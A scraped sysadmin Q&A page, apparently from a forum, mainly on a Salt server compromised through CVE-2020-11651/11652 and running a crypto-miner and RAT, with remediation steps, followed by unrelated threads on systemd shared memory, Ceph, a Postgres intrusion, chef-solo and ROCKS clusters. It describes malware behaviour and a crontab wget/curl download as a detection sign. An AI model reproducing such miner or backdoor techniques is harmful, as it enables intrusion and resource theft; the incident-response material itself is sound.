Salt-minions service consuming over 100% CPU on ubuntu, cannot remove it or find how its restarting - ubuntu-16.04

We used to use salt-master to manage about 10 servers, but have stopped now.
One of the servers is now constantly running a salt-minions service which consumes around 140%-160% of the CPU all the time. I kill it, and it just comes back again and again.
I have used apt-get to remove and purge any packages that include salt-*, as well as used dpkg to do the same.. The master salt server is not running. Yet, this instance just keeps smashing itself with this random process that just won't die.
Any assistance is greatly appreciated!
Screenshot of running processes and output from apt-get packages

This looks to be CVE related, and you need to rebuild/redeploy these systems.
Please read both:
SaltStack Blog: Critical Vulnerabilities Update CVE-2020-11651 and CVE-2020-11652
saltexploit.com
Snippet from the CVE blog:
...a critical vulnerability was discovered affecting Salt Master versions 2019.2.3 and 3000.1 and earlier. SaltStack customers and Salt users who have followed fundamental internet security guidelines and best practices are not affected by this vulnerability. The vulnerability is easily exploitable if a Salt Master is exposed to the open internet.
As always, please follow our guidance and secure your Salt infrastructure with the best practices found in this guide: See: Hardening your Salt Environment.
This vulnerability has been rated as critical with a Common Vulnerability Scoring System (CVSS) score of 10.0.
Snippet from saltexploit:
This was a crypto-mining operation
salt minions are affected and as of version 5, masters may be as well
salt-minions is a compiled xmrig binary.
salt-store contains a RAT, nspps, which continues to evolve and become more nasty
Atlassian confirms the newer revisions of the binary are a version of h2miner
Additional information
As a RAT, salt-store is more concerning than salt-minions. More on that later
There have been at least 5 different versions of the salt-store payload, each more advanced than the last.
There are additional backdoors installed, and private keys are getting stolen right and left
Seriously, change out your keys!
Symptoms
very high CPU usage, sometimes only on 1 core, sometimes on all
Fan spin! (Physical hardware only, of course.)
Mysterious process named salt-minions is CPU intensive, stemming from /tmp/salt-minions or /usr/bin/
additional binary in /var/tmp/ or /usr/bin named salt-store or salt-storer
Firewalls disabled
Most applications crashing or taken offline
Your screenshots have shown salt-minions named processes, and high CPU usage, just as described.
It would be a good idea to join the Salt community slack, too: SaltStack Community Slack and take a look at both the #salt-store-miner-public and #security channels.

Check your root's crontab with:
sudo crontab -u root -l
If you see a wget/curl download of a shell script from a random ip, you got the miner.
How to fix it:
Plan A:
Update salt-server
Wipe and reinstall all the servers connected to that master.
Plan B (usually more feasible)
Update salt-server and minions
delete the crontab with sudo crontab -u root -e
kill the salt-store and the salt minion process with kill -9 <pid> <pid> (get the pids with ps faxu)
delete the salt minion fake executable, usually in /tmp/

Related

Why Systemd remove my SHM file but not Postgresql's?

I'm developing a daemon application on Ubuntu server that being managed by Systemd.
I create a SHM file in /dev/shm/ by using shm_open, and close the file descriptor after calling to mmap. At the beginning it exists, but it disappeared after a time, maybe as I loged out from the server.
Perhaps this is controlled by the option RemoveIPC=yes in /etc/systemd/logind.conf.
My question is
Why does systemd not clean up the shm file created by Postgresql, but mine?
How to modify my app to make it like Postgresql, so that we can reduce the managing/maintaining work at the producing time.
I found that the shm memory is still available after it be cleaned by systemd. Does this mean that I can ignore that, and continue to use it without recreating?
I think your suspicion is right; see the documentation for details:
If systemd is in use, some care must be taken that IPC resources (including shared memory) are not prematurely removed by the operating system. This is especially of concern when installing PostgreSQL from source. Users of distribution packages of PostgreSQL are less likely to be affected, as the postgres user is then normally created as a system user.
The setting RemoveIPC in logind.conf controls whether IPC objects are removed when a user fully logs out. System users are exempt. This setting defaults to on in stock systemd, but some operating system distributions default it to off.
[...]
A “user logging out” might happen as part of a maintenance job or manually when an administrator logs in as the postgres user or something similar, so it is hard to prevent in general.
What is a “system user” is determined at systemd compile time from the SYS_UID_MAX setting in /etc/login.defs.
Packaging and deployment scripts should be careful to create the postgres user as a system user by using useradd -r, adduser --system, or equivalent.
Alternatively, if the user account was created incorrectly or cannot be changed, it is recommended to set
RemoveIPC=no
in /etc/systemd/logind.conf or another appropriate configuration file.
While this is talking about PostgreSQL, the same applies to your software. So take one of the recommended measures.

How can I fix ceph commands hanging after a reboot?

I'm pretty new to Ceph, so I've included all my steps I used to set up my cluster since I'm not sure what is or is not useful information to fix my problem.
I have 4 CentOS 8 VMs in VirtualBox set up to teach myself how to bring up Ceph. 1 is a client and 3 are Ceph monitors. Each ceph node has 6 8Gb drives. Once I learned how the networking worked, it was pretty easy.
I set each VM to have a NAT (for downloading packages) and an internal network that I called "ceph-public". This network would be accessed by each VM on the 10.19.10.0/24 subnet. I then copied the ssh keys from each VM to every other VM.
I followed this documentation to install cephadm, bootstrap my first monitor, and added the other two nodes as hosts. Then I added all available devices as OSDs, created my pools, then created my images, then copied my /etc/ceph folder from the bootstrapped node to my client node. On the client, I ran rbd map mypool/myimage to mount the image as a block device, then used mkfs to create a filesystem on it, and I was able to write data and see the IO from the bootstrapped node. All was well.
Then, as a test, I shutdown and restarted the bootstrapped node. When it came back up, I ran ceph status but it just hung with no output. Every single ceph and rbd command now hangs and I have no idea how to recover or properly reset or fix my cluster.
Has anyone ever had the ceph command hang on their cluster, and what did you do to solve it?
Let me share a similar experience. I also tried some time ago to perform some tests on Ceph (mimic i think) an my VMs on my VirtualBox acted very strange, nothing comparing with actual bare metal servers so please bare this in mind... the tests are not quite relevant.
As regarding your problem, try to see the following:
have at least 3 monitors (or an even number). It's possible that hang is because of monitor election.
make sure the networking part is OK (separated VLANs for ceph servers and clients)
DNS is resolving OK. (you have added the servername in hosts)
...just my 2 cents...

Postgres utilizing 100% CPU on EC2 Instance? Why? How to fix?

I am facing same issue regularly which happens 1-3 times in a month and mostly on weekends.
To explain, CPU utilization is exceeding past 100% from last 32 hours.
EC2 Instance is t3.medium
Postgres version is 10.6
OS : Amazon Linux 2
I have tried gather all the information I could get using command provided in reference https://severalnines.com/blog/why-postgresql-running-slow-tips-tricks-get-source
But didn't found any inconsistency or leak in my database, although while checking for process consuming all CPU resources I found following command is the culprit running for more than 32 hours.
/var/lib/postgresql/10/main/postgresql -u pg_linux_copy -B
This command is running from 3 separate processes at the moment and running from last 32 hours, 16 hours & 16 hours respectively.
Searching about about this didn't even returned a single result on google which is heartbreaking.
If I kill the process, everything turns back to normal.
What is the issue and what can I do to prevent this from happening again in future?
I was recently contacted by AWS EC2 Abuse team regarding my instance involved in some intrusion attack to some other server.
To my surprise, I found out that as I had used very week password root for default postgres account for my database and also had the postgres port public, the attacker silently gained access to instance and used my instance to try gaining access to another instance.
I am still not sure, how was he able to try ssh command by gaining access to master database account.
To summarise, One reason for unusual database spikes on server could be someone attacking your system.

How does chef-solo --daemonize work, and what's the point?

I understand the purpose of chef-client --daemonize, because it's a service that Chef Server can connect to and interact with.
But chef-solo is a command that simply brings the current system inline with specifications and then is done.
So what is the point of chef-solo --daemonize, and what specifically does it do? For example, does it autodetect when the system falls out of line with spec? Does it do so via polling or tapping into filesystem events? How does it behave if you update the cookbooks and node files it depends on when it's already running?
You might also ask why chef-solo supports the --splay and --interval arguments.
Don't forget that chef-server is not the only source of data.
Configuration values can rely on a bunch of other sources (APIs, OHAI, DNS...).
The most classic one is OHAI - think of a cookbook that configures memcached. You would probably want to keep X amount of RAM for the operating system and the rest goes to memcached.
Available RAM can be changed when running inside a VM, even without rebooting it.
That might be a good reason to run chef-solo as a daemon with frequent chef-runs, like you're used to when using chef-client with a chef-server.
As for your other questions:
Q: Does it autodetect when the system falls out of line with spec?
Does it do so via polling or tapping into filesystem events?
A: Chef doesn't respond to changes. Instead, it runs frequently and makes sure the current state is in sync with the desired state - which can be based on chef-server inventory, API calls, OHAI attributes, etc. The desired state is constructed from scratch every time you run Chef, at the compile stage when all the resources are generated. Read about it here
Q: How does it behave if you update the cookbooks and node files it depends on when it's already running?
A: Usually when running chef-solo, one uses the --json flag to specify a JSON file with node attributes and a run-list. When running in --daemonize mode with chef-solo, the node attributes are read only for the first run. For the rest of the runs, it's as if you were running it without a --json flag. I couldn't figure out a way to make it work as if you were running it with --json all over again, however, you can use the --override-runlist option to at least make the runlist stick.
Note that the attributes you're specifying in your JSON won't make it past the first run. This is possibly a bug.

Managing ROCKS cluster

I suddenly became an admin of the cluster in my lab and I'm lost.
I have experiences managing linux servers but not clusters.
Cluster seems to be quite different.
I figured the cluster is running CentOS and ROCKS.
I'm not sure what SGE and if it is used in the cluster or not.
Would you point me to an overview or documents of how cluster is configured and how to manage it? I googled but there seem to be lots of way to build a cluster and it is confusing where to start.
I too suddenly became a Rocks Clusters admin. While your CentOS knowledge will be handy, there are some 'Rocks' way of doing things, which you need to read up on. They mostly start with the CLI command rocks list|set command, and they are very nice to work with, when you get to learn them.
You should probadly start by reading the documentation (for the newest version, you can find yours with 'rocks report version'):
http://central6.rocksclusters.org/roll-documentation/base/6.1/
You can read up on SGE part at
http://central6.rocksclusters.org/roll-documentation/sge/6.1/
I would recommend you to sign up for the Rokcs Clusters discussion mailing list on:
https://lists.sdsc.edu/mailman/listinfo/npaci-rocks-discussion
The list is very friendly.